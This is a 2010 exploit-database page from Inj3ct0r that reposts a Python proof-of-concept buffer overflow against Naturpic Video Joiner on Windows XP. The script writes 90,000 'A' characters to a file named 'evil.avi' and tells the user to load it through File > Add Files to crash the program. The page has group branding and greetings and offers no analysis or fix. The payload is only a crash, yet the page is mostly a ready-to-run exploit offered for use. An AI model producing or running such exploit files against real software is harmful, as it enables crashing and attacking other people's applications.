Home / os / win7

Naturpic Video Joiner Buffer Overflow POC

Posted on 06 August 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Naturpic Video Joiner Buffer Overflow POC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>========================================= Naturpic Video Joiner Buffer Overflow POC ========================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_&lt;_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 1 ########################################## 1 0 I'm Sid3^effects member from Inj3ct0r Team 1 1 ########################################## 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 ####################################################################################################### #!/usr/bin/python # # Title: Naturpic Video Joiner Buffer Overflow POC # Author: Sid3^effects aKa HaRi # Date: August 5th, 2010 # Platform: Windows XP sp3 En # Thanks to: r0073r (inj3ct0r.com),L0rd CruSad3r,MaYur,MA1201,KeDar,Sonic,SeeMe,gunslinger_,Sn!pEr.S!Te,Napst3r™ # greetz to : Topsecure.net and my friends luv y0 guyz # # Usage : File--&gt;Add Files--&gt;load your evil video list(.avi) or any supported file formats :) print &quot;################################################################################&quot; print &quot; Naturpic Video Joiner Buffer Overflow POC &quot; print &quot; By: Sid3^effects &quot; print &quot; Usage: File--&gt;Add Files--&gt;load your evil video list(.avi) or any supported file formats :) &quot; print &quot;################################################################################&quot; buff = (&quot;x41&quot; * 90000) try: f1 = open(&quot;evil.avi&quot;,&quot;w&quot;); f1.write(buff); f1.close(); print &quot; Naturpic Video Joiner Buffer Overflow POC&quot; print &quot; File Created Successfully. &quot; except: print &quot;Error.&quot; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-08-06]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP